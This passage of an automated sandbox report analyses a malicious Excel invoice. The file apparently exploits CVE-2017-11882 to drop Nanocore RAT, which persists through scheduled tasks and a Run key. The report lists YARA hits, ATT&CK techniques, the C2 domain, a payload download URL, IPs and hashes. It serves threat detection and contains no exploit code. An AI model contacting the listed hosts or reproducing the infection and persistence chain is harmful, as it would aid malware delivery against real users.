ationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RAT
        Source: Yara match; File source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR

        Mitre Att&ck Matrix

        (One technique per cell; a trailing number is the report's count of signatures that map to that technique. Empty cells are columns the matrix does not fill for that row.)

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation 1 | Scheduled Task/Job 1 | Process Injection 112 | Disable or Modify Tools 11 | Input Capture 11 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 14 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | Scheduled Task/Job 1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 13 | NTDS | Security Software Discovery 211 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 2 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 112 | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 21 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 112 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

        Behavior Graph

        Behavior Graph ID: 483709
        Sample: INVOICE = 212888585 .xlsx
        Startdate: 15/09/2021
        Architecture: WINDOWS
        Score: 100

        The behavior graph itself is an image; its nodes and edges, as rendered in the page text, are:

        • Root (the sample): DNS/IP godisgood1.hopto.org; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 18 other signatures; started processes: EQNEDT32.EXE, taskeng.exe, smtpsvc.exe, EXCEL.EXE
        • EQNEDT32.EXE: DNS/IP 136.144.41.96, 49165, 80 WORLDSTREAMNL Netherlands; dropped C:\Users\user\AppData\Roaming\ALP.exe, PE32; signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started ALP.exe
        • taskeng.exe: started smtpsvc.exe and ALP.exe
        • smtpsvc.exe (started from root): signature: Injects a PE file into a foreign processes; started two smtpsvc.exe child processes
        • EXCEL.EXE: dropped C:\Users\user\...\~$INVOICE = 212888585 .xlsx, data
        • ALP.exe (started by EQNEDT32.EXE): signatures: Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, Uses schtasks.exe or at.exe to add and modify task schedules; started ALP.exe
        • smtpsvc.exe (started by taskeng.exe): signature: Injects a PE file into a foreign processes; started two smtpsvc.exe child processes
        • ALP.exe (started by taskeng.exe): started ALP.exe
        • ALP.exe (child of the EQNEDT32.EXE-started ALP.exe): DNS/IP godisgood1.hopto.org 103.147.184.84, 49166, 49167, 49168 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN unknown; dropped C:\Program Files (x86)\...\smtpsvc.exe, PE32; C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO; C:\Users\user\AppData\Local\...\tmp3811.tmp, XML; signature: Hides that the sample has been downloaded from the Internet (zone.identifier); started two schtasks.exe processes


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        INVOICE = 212888585 .xlsx | 43% | Virustotal |
        INVOICE = 212888585 .xlsx | 50% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
        INVOICE = 212888585 .xlsx | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Roaming\ALP.exe | 100% | Joe Sandbox ML |
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 30% | ReversingLabs |
        C:\Users\user\AppData\Roaming\ALP.exe | 30% | ReversingLabs |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        4.2.ALP.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
        17.2.smtpsvc.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
        4.2.ALP.exe.6c0000.3.unpack | 100% | Avira | TR/NanoCore.fadte
        16.2.smtpsvc.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
        14.2.ALP.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        godisgood1.hopto.org | 0% | Avira URL Cloud | safe
        (empty URL) | 0% | Avira URL Cloud | safe
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://136.144.41.96/HHK.exe | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          godisgood1.hopto.org | 103.147.184.84 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          godisgood1.hopto.org | true | Avira URL Cloud: safe | unknown
          (empty URL) | true | Avira URL Cloud: safe | low
          http://136.144.41.96/HHK.exe | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.%s.comPA | ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmp | false | URL Reputation: safe | low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | ALP.exe, 00000004.00000002.695025168.0000000005880000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690337039.0000000001C70000.00000002.00020000.sdmp | false | | high
          http://google.com | ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp | false | | high

              Contacted IPs

              Public

              IP | Domain | Country | ASN | ASN Name | Malicious
              103.147.184.84 | godisgood1.hopto.org | unknown | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
              136.144.41.96 | unknown | Netherlands | 49981 | WORLDSTREAMNL | true

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:483709
              Start date:15.09.2021
              Start time:11:56:16
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 43s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:INVOICE = 212888585 .xlsx
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:19
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winXLSX@26/9@18/2
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 1.8% (good quality ratio 1.8%)
              • Quality average: 94.6%
              • Quality standard deviation: 13.8%
              HCA Information:
              • Successful, ratio: 94%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Scroll down
              • Close Viewer
              Warnings:
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
              • TCP Packets have been reduced to 100
              • Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 11:56:48 | API Interceptor | 15x Sleep call for process: EQNEDT32.EXE modified |
| 11:56:49 | API Interceptor | 1529x Sleep call for process: ALP.exe modified |
| 11:56:52 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe |
| 11:56:54 | API Interceptor | 2x Sleep call for process: schtasks.exe modified |
| 11:56:55 | Task Scheduler | Run new task: SMTP Service path: "C:\Users\user\AppData\Roaming\ALP.exe" s>$(Arg0) |
| 11:56:55 | Task Scheduler | Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0) |
| 11:56:56 | API Interceptor | 406x Sleep call for process: taskeng.exe modified |
| 11:57:01 | API Interceptor | 179x Sleep call for process: smtpsvc.exe modified |

              Joe Sandbox View / Context

              IPs

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 136.144.41.96 | RFQ 13787.xlsx | malicious | 136.144.41.96/AKI.exe |
| 136.144.41.96 | Retha F. Fourie CV.xlsx | malicious | 136.144.41.96/XNJ.exe |
| 136.144.41.96 | CV Tarek Yehia.xlsx | malicious | 136.144.41.96/XNO.exe |

              Domains

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| godisgood1.hopto.org | kGIBTCae7v.exe | malicious | 103.156.91.208 |
| godisgood1.hopto.org | Vs57n7RHgP.exe | malicious | 103.156.91.208 |
| godisgood1.hopto.org | v5rJN9eflV.exe | malicious | 103.89.90.65 |
| godisgood1.hopto.org | VzzCzKHwT5.exe | malicious | 103.167.85.222 |
| godisgood1.hopto.org | TT COPY.xlsx | malicious | 103.167.85.222 |
| godisgood1.hopto.org | pYOaPT4Zks.exe | malicious | 103.167.85.222 |
| godisgood1.hopto.org | v93t289icC.exe | malicious | 103.155.81.71 |
| godisgood1.hopto.org | PO- SOHME202162312.exe | malicious | 103.155.81.71 |
| godisgood1.hopto.org | BDH9YAC4aQ.exe | malicious | 105.112.101.125 |
| godisgood1.hopto.org | JBIY8HTthL.exe | malicious | 105.112.101.125 |

              ASN

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| WORLDSTREAMNL | zoD4YzpMMG | malicious | 89.39.104.0 |
| WORLDSTREAMNL | RFQ 13787.xlsx | malicious | 136.144.41.96 |
| WORLDSTREAMNL | jPxSe1Y8HV.exe | malicious | 80.66.87.32 |
| WORLDSTREAMNL | 9c2NwBeaMN.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | 9gS8VdUFK6.apk | malicious | 89.39.105.16 |
| WORLDSTREAMNL | 7ErW9gaqY2.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | wJtL8lkk83.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | AMxo8mW9BE.exe | malicious | 80.66.87.32 |
| WORLDSTREAMNL | Sy5c0DbxMw.exe | malicious | 80.66.87.32 |
| WORLDSTREAMNL | kj1CaURZbn.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | 7liS1YWCOy.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | da6332feebc2a530509de0c661231bbd427327c31d660.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | hhXB3QLUty.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | 9c9cdb438163a2e64adcb398a6f1f1abcdc81c1cf35ab.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | 2qE9TLzYDn.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | BIbA1NbNKy.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | U7986HO2mg.exe | malicious | 185.177.125.94 |
| WORLDSTREAMNL | dJy1bkJwEW | malicious | 178.132.6.150 |
| WORLDSTREAMNL | ACDC44F3C8B2B8B12A3E396A3D9F5D353D17DAB46B0E7.exe | malicious | 136.144.41.201 |
| WORLDSTREAMNL | 07985C9819097683B7F2BC59CC7D02E0497F012187E05.exe | malicious | 136.144.41.201 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | COAU7229898130.xlsx | malicious | 103.133.106.199 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 01_extracted.exe | malicious | 103.147.185.192 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | E00VS01_Payment_Copy.vbs | malicious | 103.147.185.192 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | ORDER CONFIRMATION.xlsx | malicious | 103.133.106.199 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Renewed Contract with Annex1.xlsx | malicious | 103.133.108.160 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | V00GH01_Invoice_Copy.vbs | malicious | 103.147.185.192 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Payment_and_invoice.vbs | malicious | 103.147.184.73 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | PO-PT. Hextar-Sept21.xlsx | malicious | 103.133.106.199 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Invoice_and_payment_copy.vbs | malicious | 103.147.184.73 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | N00FX02Invoicecopy.vbs | malicious | 103.147.185.192 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | http___103.133.106.199_www_vbc.exe | malicious | 103.133.106.199 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | FED34190876.vbs | malicious | 103.140.250.132 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 7OuHFYC7TM.exe | malicious | 103.89.89.134 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Apartment.vbs | malicious | 103.147.184.73 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | TT.exe | malicious | 103.147.184.211 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | PO211000386.xlsx | malicious | 103.133.106.199 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Quotation.jar | malicious | 103.133.105.29 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Quotation.jar | malicious | 103.133.105.29 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | FRT_INV_LCIM0037223_1.xlsx | malicious | 103.133.106.199 |
| VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | HC8j8D3dw7 | malicious | 103.3.246.123 |

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):603136
              Entropy (8bit):7.259103638799268
              Encrypted:false
              SSDEEP:6144:yEAverZlQDbCMN4K4CJdAbOo36JSGgR9Smne2bEWeeKy2o+0UdzDcQRe2k3OCBuq:1WHCM2K4C4ovgkuK/o+0UmQDk3BuAt/
              MD5:60E9F1E8596C98A6B07129D9C24EC359
              SHA1:0E9E28F2853681A41A9ACE446C0597320452BD9D
              SHA-256:658E8D30979ADD1DFCCCD8ADBA33C136541FE1C9D24BFDEB3FADC5A5A5252716
              SHA-512:8BB79D52B6997C26EDBC94D2CB2DDB8E679ACF77230335EC6A09EC7280DCE5C711D0630007BB33FDE03A5983FC533C89D7A77FD6673FB2100833B82EEBEB820A
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 30%
              Reputation:low
              C:\Users\user\AppData\Local\Temp\tmp277F.tmp
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.1063907901076036
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
              MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
              SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
              SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
              SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
              Malicious:false
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\tmp3811.tmp
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1301
              Entropy (8bit):5.098799196503053
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Fxtn:cbk4oL600QydbQxIYODOLedq3wj
              MD5:D7A18DB02288E1F53BDE8B2AA0ED57EC
              SHA1:D3E7B61230A6FE796DA9820F0A0EB5C5F57E817C
              SHA-256:C4F0ED567CD7C693789C55976F82E846D4B0693EF43AD45EEE552831B8E1D18C
              SHA-512:7D7D937974C71D0784C6B108A65594C32CCB4201862DA76BC3E4F50BD6068BC2B5623754DD98B62294638998AF3A523CDA00F7236CBC993B5AB13C5589379F4E
              Malicious:true
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Roaming\ALP.exe
              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):603136
              Entropy (8bit):7.259103638799268
              Encrypted:false
              SSDEEP:6144:yEAverZlQDbCMN4K4CJdAbOo36JSGgR9Smne2bEWeeKy2o+0UdzDcQRe2k3OCBuq:1WHCM2K4C4ovgkuK/o+0UmQDk3BuAt/
              MD5:60E9F1E8596C98A6B07129D9C24EC359
              SHA1:0E9E28F2853681A41A9ACE446C0597320452BD9D
              SHA-256:658E8D30979ADD1DFCCCD8ADBA33C136541FE1C9D24BFDEB3FADC5A5A5252716
              SHA-512:8BB79D52B6997C26EDBC94D2CB2DDB8E679ACF77230335EC6A09EC7280DCE5C711D0630007BB33FDE03A5983FC533C89D7A77FD6673FB2100833B82EEBEB820A
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 30%
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:data
              Category:dropped
              Size (bytes):3016
              Entropy (8bit):7.024371743172393
              Encrypted:false
              SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrws:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCe
              MD5:1BD61AD9406ED789A9447AF5E4E1368C
              SHA1:10C211612AAFC0F9A3E5DD15A45EDC08E5D76038
              SHA-256:AD46B72200459E73CDEBC96C7A48468559D68DDC223627FBE4BCF93F32311F57
              SHA-512:79EF944DE5355166735808D59ABB8EB7AEF35BCFF537DD60783CAD75FC98FC9649D971C3A36A1566EA26B28FFAD57E9BC065BFF7D0B26E868AB2B2FC1DC39DBC
              Malicious:false
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:Non-ISO extended-ASCII text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:3:xSn:Qn
              MD5:0FE4707E3B0F792A304E0644708C1BA6
              SHA1:EEB449D38BA7803A61E577D9A1BCED12E66497D6
              SHA-256:FC8F3C2DD608575691CBAD3CF7B19C6908DF0E2E72CE9B39020B615D07635D68
              SHA-512:D0CBFAF4B800505D828E32ECCCF1C2AD84F4DB84B050C5517DCF5D0F1DB262222D4491D634FB6789C34C37CF4A5CB5680D875F9F57B9A58B65DD3BC041576B5C
              Malicious:true
              Preview: ..|.zx.H
